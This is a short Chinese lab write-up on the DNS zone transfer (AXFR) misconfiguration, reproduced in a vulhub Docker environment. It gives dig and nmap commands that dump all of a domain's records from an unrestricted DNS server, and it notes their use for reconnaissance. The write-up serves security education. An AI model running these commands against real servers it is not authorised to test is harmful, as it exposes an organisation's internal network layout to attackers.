DNS域传送漏洞
1.漏洞影响版本
DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。
2.漏洞危害
网络拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器等。直接加快、助长攻击者的入侵过程。
3.漏洞POC
cd /root/vulhub/dns/dns-zone-transfer //进入本次复现的漏洞目录
docker-compose up -d //docker-compose搭建环境

在Linux下,我们可以使用dig命令来发送dns请求。比如,我们可以用dig @your-ip www.vulhub.org获取域名www.vulhub.org在目标dns服务器上的A记录:

发送axfr类型的dns请求:dig @your-ip -t axfr vulhub.org

可见,我获取到了vulhub.org的所有子域名记录,这里存在DNS域传送漏洞。
我们也可以用nmap script来扫描该漏洞:nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 your-ip

使用docker的机器是会出现port filter的,所以使用其他的机器进行扫描

4.复盘
漏洞出现原因
DNS服务器配置不当,导致匿名用户利用DNS域传送协议获取某个域的所有记录。
通过可以实现DNS域传送协议的程序,尝试匿名进行DNS域传送,获取记录。
总结
1.用来信息收集
2.DNS域传送漏洞利用
网友评论